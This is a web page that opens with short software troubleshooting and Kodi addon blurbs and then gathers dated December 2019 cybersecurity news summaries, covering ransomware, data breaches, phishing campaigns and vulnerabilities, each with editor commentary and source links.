Hulu Loading ERROR94 prompt might indicate an issue with the internet connection or incompatibility between the device and the application. Below are the troubleshooting steps to resolve “Failed to load Hulu” Loading ERROR94 in Hulu.
The “Could not complete your request because of a program error” error message in Photoshop is often caused by the generator plugin or the settings related to the image file extension. Below are various solutions to resolve this error message.
When you try to open an image file with Photos app in Windows 10, it might not open the file but display “We can’t open this file” error message. Perform the below steps to resolve this error.
When considering AI, you may have potential questions or simply want to understand AI better. Trusting and understanding AI is key to a successful AI transformation. This is especially pertinent in industries with stringent regulations, such as financial services, banking, and healthcare. After all, if the AI gets it wrong, people may be adversely affected.
When you use the Snooze function in Gmail, there are three default times which are morning, afternoon, and evening set to 08:00 (8:00 a.m.), 13:00 (1:00 p.m.), and 18:00 (6:00 p.m.), respectively. You can set the snooze time by picking the date and time manually. The default settings are actually managed in Google Keep. Here are the steps for how to change the default snooze times.
If you regularly misspell certain words or sentences while typing in Google Docs, the automatic substitution feature allows you to train it to recognize those words and auto-correct them as you type. The classic example possibly typing “teh” instead of “the”. Google Docs helps you counter these habits with the automatic substitution feature allowing you to select a substitution in any Google Doc documents you create or edit. Here’s the steps to enable Automatic Substitution in Google Docs.
Neptune Rising addon combines great quality video links with friendly UI navigation. In this article, I will show you a step-by-step way for how to install Neptune Rising on Kodi.
A new Exodus fork that works called Exodus Redux has recently been released and is being actively developed, constantly maintained by the developer. Exodus Redux addon is running Lambda Scrapers which allows it to find online content faster. In this article, we will show you a simple step-by-step guide to install Exodus Redux for Kodi Version 18.2, 18.1 and 17.6 on Android TV, Amazon Firestick, Apple and Windows devices.
The headline on 18 December 2019
Facebook Tracks Users’ Purchases in the Physical World. A recent report highlights that a partnership between Facebook and several retailers enables the retailers to transfer the purchase history of their customers to Facebook. Facebook in turn uses that data to target those customers with advertisements relating to their purchases when they access the Facebook social media platform.
- I am less worried about Facebook’s capability for targeting than I am about who they allow to use the targeting capabilities, and what policies Facebook applies to the content and transparency of the “ads” that are put in front of targeted users. The prime example is Facebook policy to allow any content from political advertisers, with minimal or no differentiation when Custom or Lookalike Audience targeting is used. This allows blatant lies and misinformation to be put in front of targeted audiences that would never be allowed by other advertising channels, both traditional and modern social media, like Twitter and Google.
- Facebook’s business practices are such that it is unlikely that users can understand the risk of doing business with them. Better to just avoid doing business with them altogether.
Read more in:
- 6abc > Report: Facebook tracks in-store purchases, targets users with ads
- Business Insider > This is how Facebook learns what you buy at physical stores in order to show you relevant ads — and how to opt out
New Jersey Hospital System Victim of Ransomware Attack. The largest provider of a hospital system, Hackensack Meridian Health, in New Jersey were victims of a ransomware attack and ultimately paid the ransom to restore their systems. The ransomware attack forced hospitals who are clients of Hackensack Meridian Health to postpone non-emergency operations and resulted in medical staff not being able to access electronic records. Hackensack Meridian Health said their primary clinical system is now back online and are working on restoring other affected systems. The company is working with the FBI and cybersecurity experts. Hackensack Meridian Health runs 17 acute care and specialty hospitals, nursing homes, outpatient centers, and the psychiatric facility Carrier Clinic
Personal Data of Facebook Employees Exposed on Stolen Unencrypted Hard Drives. Personal data of 29,000 US based Facebook employees, which included banking data, was lost when unencrypted hard drives were stolen from a payroll workers car. Police are investigating the theft. It is unclear why the employee stored the unencrypted hard drives in their car and why they were being transported in this way. A spokesperson for Facebook stated that the company has taken appropriate disciplinary action with the payroll employee involved.
Note: Obviously several policy failures here. This can be a good news item to use to drive a check on current policies around encrypting storage as a default and providing secure mechanisms for data transport that should eliminate any reason to carry hard drives around in cars!
Read more in:
- The Verge > A thief stole unencrypted hard drives filled with 29,000 Facebook employees’ information
- Bloomberg > Thief Stole Payroll Data for Thousands of Facebook Employees
- The Register > Valuable personal info leaks from Facebook – not Zuck selling it, unencrypted hard drives of staff data stolen
Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search. Forbes has discovered that Google has complied with so-called geofence warrants that have resulted in an “unprecedented” data haul for law enforcement: one in which Google combed through its SensorVault to find 1,494 device identifiers for phones in the vicinity of the fires and then handed them over to the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF).
Note: Recent court decisions and FCC investigations into “who owns location data” have tended to focus on telecoms carriers and to some extent mobile phone manufacturers. This points out that location-based metadata is collected and stored by many different companies. Courts and legislators are moving slower than ever, we need the technology companies to be proactive about adopting secure defaults for protecting location data and high transparency about when it is collected and sold or given to third parties.
Read more in:
- nakedsecurity by SOPHOS > Police get “unprecedented” data haul from Google with geofence warrants
- Forbes > Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search
Internet of Things Gear is Generating Easy-to-Crack Keys. A preponderance of weak keys is leaving IoT devices at risk of being hacked, and the problem won’t be an easy one to solve.This was the conclusion reached by the team at security house Keyfactor, which analyzed a collection of 75 million RSA certificates gathered from the open internet and determined that number combinations were being repeated at a far greater rate than they should, meaning encrypted connections could possibly be broken by attackers who correctly guess a key.
- There used to be a talking Barbie doll that would say “Math is hard!” which was certainly sexist, but still a very, very true statement. Crypto is math, and crypto is hard – 25 years ago the US government issued the FIPS-140 standard because of crappy crypto coming out in commercial software. Similar action is needed for the IoT generation of claims of use of cryptography to secure device use.
- IoT device manufacturers continue to prioritize time-to-market over security. Until that situation improves, leverage segmentation and restrict network access to only services they need, if any.
Read more in:
- Keyfactor > Factoring RSA Keys in the IoT Era
- The Register > Internet of crap (encryption): IoT gear is generating easy-to-crack keys
New Orleans Mayor Declares State of Emergency After City Cyberattack. New Orleans Mayor LaToya Cantrell declared a state of emergency Friday after the city was hit by a cyberattack. Phishing attempts and suspicious activity were detected on the city’s network around 5 a.m., and by 11 a.m., technician investigators detected “a cybersecurity incident” causing the city’s information technology department to begin powering down servers and city computers as a precaution.
Read more in:
- Security Magazine > New Orleans Hit by Cyberattack; Declares State of Emergency
- CNN > New Orleans mayor declares state of emergency in wake of city cyberattack
Blue Cross Blue Shield of Minnesota Scrambling to Improve Cybersecurity. An internal whistleblower raised concerns that the Minnesota’s largest health insurer has neglected thousands of important updates to its computer system. The company’s top cybersecurity executive says the insurer has been working diligently in recent weeks to reduce its vulnerability for a cyber attack. Internal documents show the BCBS of Minnesota has allowed 200,000 vulnerabilities deemed “critical” or “severe” to linger for years on its computer systems, despite warnings to executives.
Many phishing sites spotted in global government focused campaign. Over 62 domains and 122 phishing sites targeting Government users were discovered by security vendor Anomali. Unlike other phishing campaigns which enabled detection through spelling and grammar errors, these are well crafted multi-language campaigns such that the primary indications are that the messages are from unknown users and have unexpected attachments.
Read more in:
- Infosecurity > Over 100 Phishing Sites Spotted in Global Government Campaign
- ISBuzz News > New Phishing Campaign Targeting Gov’t Departments Around The World – Commentary From Email Security Expert
FTC advice on checking Internet-connected toys before buying. Internet-connected toys are in high-demand this year, and the FTC is making recommendations for parents to consider prior to purchase and upon receipt. The advice includes checking for microphones and cameras and verify that you can determine when they are active. Other recommendations: Don’t rely on the Children’s Online Privacy Protection Act (COPPA). Checklists like this are beneficial, remember that regardless of the security reputation of the manufacturer and regulatory oversight, you must verify which features are enabled and that they are configured properly.
Read more in:
- BleepingComputer > FTC Advises Checking Smart Toy Features Before Buying
- Federal Trade Commission Consumer Information > Buying an internet-connect smart toy? Read this
- Norton > 8 ways to help protect your kids’ privacy against smart toy vulnerabilities
Relaunched Toys R Us uses technology to monitor customers. The relaunched Toys R Us stores are now including sensors to monitor customer activities. In support of their new business model, which leases areas of the store to toy providers, are Installed by business partner B8ta, the sensors will monitor how customers move around the store and determine which areas get the most activity. There has been some social media uproar relating to confusion over the term monitoring shopper cadence, which is meant to capture shopper movement patterns, not conversation/voice capture; additionally there are concerns about whether the system actually ignores people under four feet tall to not run afoul of COPPA requirements regarding parental consent prior to data capture for children under 13.
Note: The data collected will be used to influence the costs of the leased spaces, particularly those with high success rates. The question of not capturing patrons under four feet tall versus the claim that the information is being captured in public places, and not bound by COPPA needs to be resolved quickly; especially as Toys R Us is catering to children.
Read more in:
- syracuse > Geoffrey’s watching: Sensors at new Toys R Us stores track shoppers
- FierceElectronics > Revived Toys R Us wired up to monitor customers
- WIRED > Toys “R” Us is back – Now With More Surveillance!
Plundervolt Voltage Attack Steals Data from Intel Chips. Newly discovered “Plundervolt” vulnerability (CVD-2019-11157) uses CPU voltage modification to target and expose data in Intel’s Software Guard Extensions (SGX). Intel has released a microcode update to address the issue, or disable the SGX functionality. Data recovered can include keys needed for cryptographic operations and the exploit can be used to corrupt program memory. To use the protections offered by SGX, it must be both enabled in BIOS as well as incorporated into application code. Exploitation requires local privileged access.
Note: Because the likelihood of exploitation is low, due to local privileged access requirements, Intel released a microcode fix that addresses this. The promise of SGX is encrypted enclaves to protect sensitive code, even from code running at higher privilege levels, and is intended to bring added security to cloud based computing.
Read more in:
- nakedsecurity by SOPHOS > Plundervolt – stealing secrets by starving your computer of voltage
- SecurityWeek > Plundervolt Attack Uses Voltage to Steal Data from Intel Chips
- PCWorld > Protecting your Intel CPU from Plundervolt attacks can ruin your overclock, maybe
Some Hardware based password managers store passwords in plaintext. Investigation of ecZone Password Safe, passwordsFAST, and Royal Vault Password Keeper devices by security researcher Phil Eveleigh found that while a passcode is used to protect access to the stored passwords, direct access to the chip provides access to plain-text passwords as well as the master pin. Further, he found that even after full reset the passwords were not cleared in some devices. Note that while the Royal Vault Password keeper encrypts the data, decryption is possible by discovering the master PIN within the stored dataset. No responses have been received from the device manufacturers regarding the issues discovered.
Note: Retrieving the clear-text passwords required chip access to the device, which makes the risk of exploit low, even so, unless the wipe operation can be verified, choose physical destruction rather than wipe and reissue. Also, be sure to use strong master passwords to limit unauthorized access to passwords through the normal mechanisms.
Read more in:
- SecurityWeek > Hardware-based Password Managers Store Credentials in Plaintext
- BleepingComputer > Some Hardware-based Password Managers have poor security
Last patches for Windows 10 Mobile released. The last round of security patches for Microsoft’s Windows 10 Mobile were released, marking the end of Microsoft’s attempt at a mobile operating system. Windows 10 Mobile was officially end of support on June 11, 2019. Many Microsoft execs carry Android devices rather than ones powered by Windows Mobile. Bill Gates feels that had he not been distracted by copyright and related lawsuits, and released Windows Mobile three months earlier, the market niche held by Android would have been Microsoft.
- In 2010, at a session at a Gartner conference, I asked then Microsoft CEO Steve Ballmer how Microsoft was going to succeed in the mobile phone market and his answer was “Windows, baby!” Also, six years earlier Bill Gates said Microsoft would rid the world of spam by 2006. I don’t think copyright issues and lawsuits are really to blame for the failure of those two predictions. But owners of large installed bases do tend invest too much in fighting off threats to the profitability of that base vs. innovating to meet users changing needs. As many of stories in this issue point out, we are nearing one of those tipping points around protecting user data vs. profiting from it.
- Windows Mobile was a nice operating system, and Microsoft wanted to be “the” mobile device OS provider, success wasn’t solely dependent on timing of the release or lawsuits, I recall the market was looking for an open solution which is where Android fit in.
London Metropolitan Police Trained to Fight Cybercrime. A Freedom of Information request submitted to the London Metropolitan police has highlighted that thousands of police on that force have received some level of training in fighting cybercrime. The training has been provided using online training solutions and approximately 4,500 officers took the “Cyber Crime and Digital Policing – First Responder”, while another 4,500 completed the “Cyber Crime and Digital Policing – Introduction course”
Note: The average citizen is not going to have the background on how to select help during an incident, so providing them the option to call the police when they have a cyber incident, and get a responder who has been properly trained raises the bar on proper actions being taken and increases the likelihood of a successful outcome.
The headline on 15 December 2019
WordPress 5.3.1 Security & Maintenance release to resolve the following issues:
- Unprivileged users could make a post sticky via the REST API.
- Cross-Site Scripting vulnerability can be stored in links.
- Stored Crossed-Site Scripting vulnerability using block editor content.
The headline on 11 December 2019
44 Million Compromised Credentials Used on Microsoft Accounts. Microsoft engineers recently analyzed over three billion credentials known to be compromised by criminals. Utilizing sources from law enforcement and public databases of breached accounts the Microsoft Team identified 44 million user accounts of Microsoft services were reusing known compromised credentials. These accounts ranged from Microsoft’s consumer services to credentials used by companies for Microsoft Azure.
- Credential reuse, and/or poor password choices by users necessitate the use of multi-factor authentication. IDPs can be configured for location and device awareness to raise the bar, or completely block authentication for unknown devices or untrusted environments. Disable, or highly restrict the use of legacy protocols that cannot be configured for MFA.
- Reused passwords and fraudulent password reuse are known problems, but they are the result of the bind in which many users find themselves. Users should employ password managers and strong authentication, such as is offered by Microsoft and its peers. Enterprises should avoid overly complex password rules that make choosing a password difficult and should offer strong authentication options to their users.
Read more in:
- Infosecurity Group > Microsoft: 44 Million User Passwords Have Been Breached
- Help Net Security > Compromised passwords used on 44 million Microsoft accounts
China Reportedly Orders State Offices To Remove Foreign Tech Which Could Hit US Firms Like Microsoft. China’s Communist Party has ordered all state offices to remove foreign hardware and software within three years. Systems and software are to be replaced with Chinese provided equivalents. The replacement encompasses 20-30 million pieces of equipment and commences in 2020. Organizations are required to meet milestones of 30%, 50% and 20% in 2020, 2021 and 2022 respectively. China began building a Windows and iOS replacement in 2013, with the help of British company Canonical. This move affects US providers including HP, Dell, and Microsoft. China’s latest policy may be seen as one of the most direct moves against U.S. technology firms during the trade war.
Note: Unfortunately, the longer these types of trade war escalations continue, the likelihood of impact on buying and selling of security products and services continues to increase. Huawei and Kaspersky have seen the impact of US directives against buying their security products; large US security vendors could see similar impacts from large foreign markets. From an enterprise perspective, this dictates the need for backup planning in case your existing vendors are caught in the crossfire. [Neely] This is motivated by trade wars and threats of economic sanctions rather than increased security or locally produced products. Even Chinese vendors such as Lenovo or Huawei are heavily impacted by these sanctions. Businesses need to consider location when developing lists of alternate suppliers, particularly when suppliers are overseas and can be impacted such actions.
Read more in:
- CNBC > China reportedly orders state offices to remove foreign tech which could hit US firms like Microsoft
- Financial Times > Beijing orders state offices to replace foreign PCs and software
- The Telegraph > China orders officials to remove foreign tech from computers
- ZDNet > Chinese government to replace foreign hardware and software within three years
- TechCrunch > China moves to ban foreign software and hardware from state offices
New Zealand Releases Cybersecurity Governance Resource. New Zealand’s Government Communications Security Bureau’s National Cyber Security Centre (NCSC) has produced a resource for boards to help improve cybersecurity governance. The NCSC study interviewed cybersecurity professionals from 250 of New Zealand’s nationally significant organizations. The governance resource called Charting Your Course: Cyber Security Governance sets out six areas that will help focus engagement between an organization’s governance and its security practitioners.
Note: This initial publication is a good deal too buzzword-laden for me – anytime I see “resilient”, “security culture” and “holistic” on one page my eyes glaze over. Hopefully, the following on drill-down documents will focus more on bridging the realities of corporate governance and operations to the realities of effective cybersecurity as a critical and integral factor in the success of the corporation.
Read more in:
- CISA > NCSC-NZ Releases Cyber Governance Resource for Leaders
- OpenGov Asia > New Zealand releases cybersecurity governance resource
- National Cyber Security Centre > Charting Your Course: Cyber Security Governance
Google Releases Open Source Tool for Finding File Access Vulnerabilities. Google on Monday has released the source code of a tool designed to help developers identify vulnerabilities related to file access. The tool, named PathAuditor, has been useful to Google and the company has now decided to release it as an open-source. The tech giant is still actively working on PathAuditor and pointed out that it’s not an officially supported Google product.
Note: Many vulnerability assessment/management tools will find similar vulnerabilities, check with your existing vendor. Google often throw spaghetti on the wall and then moves on – unless this gets broad support, better to see existing products incorporate such capabilities.
Read more in:
- SecurityWeek > Google Releases Open Source Tool for Finding File Access Vulnerabilities
- Google Security Blog > Detecting unsafe path access patterns with PathAuditor
New Phishing Campaign Uses Self-Contained Webpage to Steal Credentials. Researchers have spotted a new phishing campaign that attempts to steal credentials. However, this campaign is different from the commonly observed ones. The phishing attack does not redirect victims to another site for login like a lot of phishing campaigns usually do. Instead, it bundles the scam’s landing page in the HTML attachment, likely in an attempt to bypass security filters and analytics on web proxies.
Note: Scanners don’t typically inspect the attached HTML content sufficiently to discover malicious content embedded in these attachments. While we coach users to use caution with attachments, the prevalence of applications that attach content in HTML attachments encourages the opposite behavior. In addition to focusing on updated user awareness, consider endpoint protection strategies that include blocking access to non-categorized and known bad sites.
Read more in:
- SANS ISC InfoSec Forums > Phishing with a self-contained credentials-stealing webpage
- CYWARE > New Phishing Campaign Uses Self-Contained Webpage to Steal Credentials
US Government Website For Federal Rules Input Inaccessible Due To Expired SSL Certificate. Regulations.gov, the US Government’s portal for industry and the public to make comments in response to proposed regulations, suffered a self-inflicted denial of service attack when the digital certificate to enable secure HTTP expired. The website returned to service on Monday night after being out for much of the day. At least one government agency had to extend the deadline on public comment. [Neely] Current browser versions do a really good job of blocking access to sites with certificate problems, whether expired, untrusted issuer, name-mismatch, etc. raising the bar on the IT team to keep certificates updated. Consider using certificate issuers that support automated updates. Alternately, a script to scan and alert on certificates that are due to expire is not difficult to create, making sure the alerts trigger ITSM tickets, so it won’t be missed.
Read more in:
- San Francisco Chronicle > Government website for federal rules input shuts off
- Bloomberg Tax > Labor Department Extends Comment Period on Tip-Pool Proposal
New Jersey Shakespeare Theater Hit By Ransomware. The Shakespeare Theatre of New Jersey was forced to cancel a performance of “A Christmas Carol” after their reservation and ticketing system were hit by ransomware. They are currently selling tickets, but not able to perform seat assignments until patrons arrive at the venue. Other businesses in their area were reportedly also affected at the same time.
Note: This underscores the value of reaching out to customers during an incident, being transparent about the incident and asking for their support. Patrons continue to make reservations and bear with the theater as they work to restore normal operations. Make sure your DR/Incident response plan includes customer notification and support.
Read more in:
- SC Magazine > My Kingdom for a decryptor! Ransomware creates ticketing snafu for N.J. Shakespeare theater
- BleepingComputer.com > Ransomware Writes Drama at Shakespeare Theatre
- New Jersey Stage > Severe Ransomware Attack Strikes The Shakespeare Theatre of New Jersey Ticketing System On Eve of “A Christmas Carol” run
Read more in:
- Forbes > China Fires ‘Great Cannon’ Cyber-Weapon At The Hong Kong Pro-Democracy Movement
- ZDNet > China resurrects Great Cannon for DDoS attacks on Hong Kong forum
Apple Explains iPhone 11 Location Requests. Apple’s iPhone 11 USES Ultra-Wideband radio for short-range high bandwidth file exchange. UWB uses location services to find other UWB devices. These requests happen even when applications and services are set not to request location data. This is disabled in airplane mode. The checks for the location also verify the device is in a country where UWB is permitted.
Note: Future versions of iOS are supposed to contain a setting explicitly for toggling UWB. The wide spectrum, multi-channel use by UWB permits data transfer at up to 1.6Gbps for a few meters. UWB is currently used to improve the performance of Airdrop.
Read more in:
- KrebsOnSecurity > Apple Explains Mysterious iPhone 11 Location Requests
- TechCrunch > Apple says its ultra-wideband technology is why newer iPhones appear to share location data, even when the setting is disabled
- iPhone User Guide > Ultra Wideband information
US-CERT AA19-339A: Dridex Malware. A recent collaboration between the Department of Treasury’s FinCEN and CIG groups, in response to Dridex malware’s continued use in the financial sector, provides a consolidated reference on Dridex including an overview, related activities, IOCs, mitigations, and recommendations.
Read more in:
- CISA > US-CERT Alert (AA19-339A)
- SafeBreach > Hacker’s Playbook Already Protects for Methods used in US-CERT Malware Analysis Alert AA19-339A
T-Mobile Launches 600Mhz 5G. T-Mobile pushed out 5G services across the US but using its 600MHz LTE-like spectrum. This service doesn’t operate at the full 5G speeds. The fastest 5G requires millimeter wave (mmWave) which is easily obstructed and doesn’t go far.
Note: Mobile Operators are rolling out 5G in stages, leveraging their existing LTE resources and spectrum. Your device may report a 5G (or 5Ge) connection without delivering the increased speed promised by 5G. mmWave deployments, needed for those increased speeds, require a very dense deployment of radios and supporting fiber infrastructure, which some communities are challenging.
Read more in:
- The Verge > T-Mobile launches 600MHz 5G across the US, but no one can use it until December 6th
- CNBC > T-Mobile shows why it’s still too early to buy a 5G phone
Car Makers BMW and Hyundai Victims of Cyber Attack. The carmakers BMW and Hyundai are reported to have been hacked by a criminal group known as Ocean Lotus, also known as APT 32. The alleged compromise is reported to have happened in the spring of 2019 when BMW’s security team discovered an instance of a commercial hacking tool, Cobalt Strike, installed on a workstation. The reports also state the car manufacturer Hyundai were also a victim of this group. The Ocean Lotus group is alleged to be behind attacks against other car manufacturers such as Toyota Japan, Toyota Australia, and Toyota Vietnam.
Read more in:
- ZDNet > BMW and Hyundai hacked by Vietnamese hackers, report claims
- BleepingComputer > BMW Infiltrated by Hackers Hunting for Automotive Trade Secrets
- BR24 > Autoindustrie im Visier von Hackern: BMW ausgespäht (Original reporting from German media – note reports are in German)
- ARD > BMW von Hackern ausgespäht
Amazon Buckets Leak over 750,000 Applicants’ Data for US Birth Certificates. A company that provides a service to allow customers to apply for copies of birth certificates from US States has allegedly exposed the personal details of those applicants. A UK based security research company identified the unsecured Amazon Bucket which contained the personal details of 750,000 people. The data includes their name, date of birth, email address, and home address, amongst other details.
Read more in:
The headline on 07 December 2019
Data Center Ransomware Infection. Data Center provider CyrusOne has confirmed that it suffered a ransomware attack earlier this week. The company says that the incident has affected “availability issues” for six of its managed services customers.
- This attack appears to be caused by a version of the REvil (Sokinokibi) ransomware, which also impacted 23 local governments across Texas earlier this year. Consider the impact/risks if one of your providers, such as your colocation service or your MSP, is impacted, and doesn’t plan to pay the ransom, as is indicated in this case; are you prepared with alternatives to continue operations for the duration of the incident?
- The six customers are called “collateral damage.” The drug company, Merck, was such collateral damage when one of its service providers was compromised. It has caused them to re-think and restructure their relationship with the thousands of providers in their “supply chain.”
Illinois School District Hit with Ransomware. The Sycamore Community School District 427 in Illinois has been hit with ransomware. The attack appears to be limited to the district’s “internal technology servers;” many other district systems, including email, phones, and student information systems are reportedly not infected.
Evil Corp. Hacking Group Indictments. US federal prosecutors have indicted Maksim Yakubets and Igor Turashev, who are allegedly members of the hacking group known as Evil Corp. The pair allegedly “led one of the most sophisticated transnational cybercrime syndicates in the world,” according to a US Department of Justice press release.
Read more in:
- Department of Justice.gov > Russian National Charged with Decade-Long Series of Hacking and Bank Fraud Offenses Resulting in Tens of Millions in Losses and Second Russian National Charged with Involvement in Deployment of “Bugat” Malware
- Ars Technica > Kingpin of Evil Corp lived largely. Now there’s a $5 million bounty on his head
- WIRED > Alleged Russian Hacker Behind $100 Million Evil Corp Indicted
- SC Magazine > U.S. charges alleged members of “Evil Corp” cybercrime group for Zeus and Dridex campaigns
- THE HILL > US sanctions Russian group over $100M cyber hack
Man-in-the-Middle Attack Used to Steal Venture Capital Investment. Hackers used a complex man-in-the-middle attack to steal approximately US $1 million from a Chinese venture capital firm that was supposed to be going to a start-up company in Israel. The hackers set up phony domains and spoofed emails between the companies, even going so far as to cancel a scheduled in-person meeting.
Note: Verify the log retention period and access requirements for your email and related systems before an incident, making sure that there are not only at least six months of information but also that sufficient information is captured and your staff will be able to access it when needed. Always use an out-of-band verification process with wire transfers to ensure they are going to the intended recipient.
Read more in:
- Check Point Research > Incident Response Casefile – A successful BEC leveraging lookalike domains
- threatpost > ‘Ultimate’ MiTM Attack Steals $1M from Israeli Startup
- VICE > Hackers Trick Venture Capital Firm Into Sending Them $1 Million
- The Register > VCs find exciting new way to blow $1m: Wire it directly to hackers after getting spoofed
Great Cannon DDoS Tool Reportedly Being Used on Hong Kong Protesters’ Online Forum. A distributed denial-of-service (DDoS) tool known as the Great Cannon has reportedly been used against the LIHKG social media platform used by protesters in Hong Kong. China’s Great Cannon was first described by Citizen Lab in April 2015.
Read more in:
- BleepingComputer > The Great Cannon DDoS Tool Used Against Hong Kong Protestors’ Forum
- Infosecurity GROUP > China’s Great Cannon Fires on Hong Kong Protesters
- the Citizen Lab > China’s Great Cannon
ZeroCleare Wiper Malware Used Against Energy, Industrial Organizations in the Middle East. IBM has detected new malware, dubbed ZeroCleare, that has been used to wipe data at energy and industrial sector organizations in the Middle East. The targeted attacks were likely the work of Iranian state-sponsored hackers.
Note: We must move away from the default access control rule of “read/write,” convenient but risky, to “read-only” for data and “execute only” for programs, marginally less convenient but you will get over it.
Read more in:
- SecurityIntelligence > New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East
- The Register > Oil be damned: Iran-based crooks flinging malware at Middle Eastern energy plants again – research
- cyberscoop > IBM sounds alarm about more data-wiping malware from Iran
- threatpost > Iran Targets Mideast Oil with ZeroCleare Wiper Malware
- ZDNet > Iranian hackers deploy new ZeroCleare data-wiping malware
- Ars Technica > New Iranian wiper discovered in attacks on Middle Eastern companies
- DARKReading > Shades of Shamoon: New Disk-Wiping Malware Targets Middle East Orgs
- BleepingComputer > New Iranian ZeroCleare Data Wiper Malware Used in Targeted Attacks
- Duo Security > New ZeroCleare Wiper Malware Used In Targeted Attacks
US Senators Get Classified Ransomware Briefing. US legislators received a classified briefing about the threat of ransomware on Wednesday, December 5. Christopher Krebs, director of the US Department of Homeland Security’s (DHS’s) Cybersecurity and Infrastructure Security Agency (CISA) spoke to the Senate Cybersecurity Caucus.
- Briefings like this are needed to ensure continued support of initiatives and resources to help state and local governments which may not have access to the needed tools and information to implement needed protections in the current threat environment. That said, with the current active exploitation environment, waiting for external help is ill-advised.
- Ransomware is now the preferred way to monetize compromised systems and enterprises. We know that the vectors for attacks are e-mail and browsers, but we fail to isolate these from mission-critical data, applications, and systems. We know that the vulnerability includes the capability for the system user to modify it on the fly, but we fail to lock them down by denying the user admin privileges and by restricting “write” access. This is not mere negligence but borders on recklessness.
Read more in:
- cyberscoop > DHS official briefs senators on state ransomware threats in a classified meeting
- Fifth Domain > Here’s what senators learned about the ransomware threat
- THE HILL > Senators sound alarmed on dangers of ransomware attacks after briefing
Rich Communication Services Implementations Found to be Unsecure. Researchers have found that telecommunications carriers are implementing a new messaging standard in ways that could allow communications to be intercepted, modified, or spoofed. The Rich Communication Services (RCS) standard is fairly new and has a broader range of features than SMS.
- What’s being called into question are implementation flaws, rather than flaws in the protocol itself. RCS shows promise to provide a more secure alternative to SMS and avoid the pitfalls in SS7. RCS is one to keep an eye on, especially when a verified secure implementation is available.
- It looks as if messaging may be going the route of the browsers: adding features until the product is porous, not to say broken.
Read more in:
- VICE > SMS Replacement is Exposing Users to Text, Call Interception Thanks to Sloppy Telecos
- WIRED > The Future of Texting Is Far Too Easy to Hack
Siemens Provides Workaround for PLC Flaw. Siemens has released workarounds to address a vulnerability in its S7-1200 programmable logic controllers (PLCs) while is develops a fix for the problem. The issue lies in “an undocumented hardware-based special access feature,” and could be exploited to take control of vulnerable devices.
Read more in:
- DARKReading > Siemens Offers Workarounds for Newly Found PLC Vulnerability
- Siemens ProductCERT > Hardware-based manufacturing access on S7-1200 (PDF)
NIST Draft Guidance on Hardware Supply Chain Security. The US National Institute of Standards and Technology (NIST) has published draft guidance on hardware supply chain security, Validating the Integrity of Servers and Client Devices. NIST will accept comments on the document through January 6, 2020.
Note: This is about building standards to support supply chain security, which has been a challenge of late. The document is a short, easy read, encapsulating information from some other NIST and external documents on OEM supply chain security. Despite the short timeline and the holiday season, it’s worth reading and contributing to.
Read more in:
- NIST > Validating the Integrity of Servers and Client Devices (PDF)
- Duo Security > NIST Developing Hardware Security Guidelines for Enterprises
The headline on 04 December 2019
Great Plains Health Recovering From Ransomware. Great Plains Health (GPHealth) medical center is recovering from a ransomware attack. The attack occurred on Monday, November 25. The next day, GPHealth canceled a large number of non-emergency appointments and procedures. GPHealth is based in North Platte, Nebraska.
Note: Speaking of HHS notifications, in the Sentara Hospitals story below, the regulators want you to tell them all about your ransomware problems, even if you think it’s just an integrity issue and not confidentiality. HHS put out specific ransomware guidance a few years ago. Yes, it’s a breach: www.hhs.gov: FACT SHEET: Ransomware and HIPAA
Read more in:
- Ransomware Locks Medical Records at Great Plains Health
- Ransomware Attack Forces Great Plains Health to EHR Downtime
Common Weakness Enumeration List Updated. The MITRE Corp has updated the Common Weakness Enumeration (CWE) list. According to MITRE, the CWE Top 25 is “a demonstrative list of the most widespread and critical weaknesses that can lead to serious vulnerabilities in software.” Topping the revised list is “Improper Restriction of Operations within the Bounds of a Memory Buffer.” Cross-site scripting errors are listed second. SQL injection vulnerabilities, which topped the previous version of the list, is now in sixth place. MITRE Corp. operates the Department of Homeland Security’s (DHS’s) Systems Engineering and Development Institute.
Note: Sadly, we can enumerate our errors but not fix them. Part of the problem here is the von Neumann Architecture, part of the languages we use, part that the programmer does not, or cannot, know the environment in which his program will run, and only a small part that it is a hard problem. However, a good craftsman does not blame his tools. If we insist upon using flawed tools for hard problems, we must train to compensate for them. Our tolerance for shoddy continues to be an embarrassment.
Read more in:
- 2019 CWE Top 25 Most Dangerous Software Errors
- Snapshot: Top 25 Most Dangerous Software Errors
- SQL Injection Errors No Longer the Top Software Security Issue
- Top 25 Most Dangerous Vulnerabilities Refreshed After 8 Years
Google Warns Users of Nation-State Email Hacking. In three months earlier this year, Google notified more than 12,000 users that their accounts were being targeted in phishing attacks conducted by government-backed hackers. The majority of alerts were sent to users in South Korea, Pakistan, Vietnam, and the US.
Note: SANS instructor Heather Mahalik did a great talk at the SANS keynote threat panel at the RSA conference on how much information many users expose to cloud-based email providers such as Gmail, and common ways attackers use social media paths to trick users into exposing password reset info. Heather gave great advice to give to executives. You can see a summary with links in the white paper at www.sans.org: SANS Top New Attacks and Threat Report (PDF)
Read more in:
- Google Warns 12,000 People They Were Hit By Government Hackers—Here’s What To Do If You’re A Target
- Google caught a Russian state hacker crew uploading badness to the Play Store
- In just three months, Google sent 12k warnings about government-backed attacks
Sentara Hospitals Fined for Failing to Properly Report Breach to HHS. Virginia-based Sentara Hospitals has agreed to a $2.2 million settlement with the Office for Civil Rights (OCR) at the U.S Department of Health and Human Services (HHS) over violations of the Health Insurance Portability and Accountability ACT (HIPAA). OCR launched its investigation after learning that Sentara had mailed nearly 600 patients’ personal health information to the wrong addresses. Sentara has also agreed to “a corrective action plan.”
Note: The fine works out to about $3,600 per record exposed, a really scary number that will be good ammunition for getting senior management attention. In 2019, HHS has issued 7 fines averaging just under $2M each – the size of the fines is more related to large process deficiencies than to the size of the breach. The average profit margin in healthcare is in the 5% range, meaning that a $2M fine essentially cancels out $40M in revenue! That is a better number to use when trying to justify the spending needed to reach basic security hygiene levels.
Read more in:
- OCR Secures $2.175 Million HIPAA Settlement After Hospitals Failed to Properly Notify HHS of a Breach of Unsecured Protected Health Information
- US Hospitals Fined $2.175M for “Refusal to Properly Report” Data Breach
- Sentara Hospitals’ HIPAA Settlement: Why $2.2 Million?
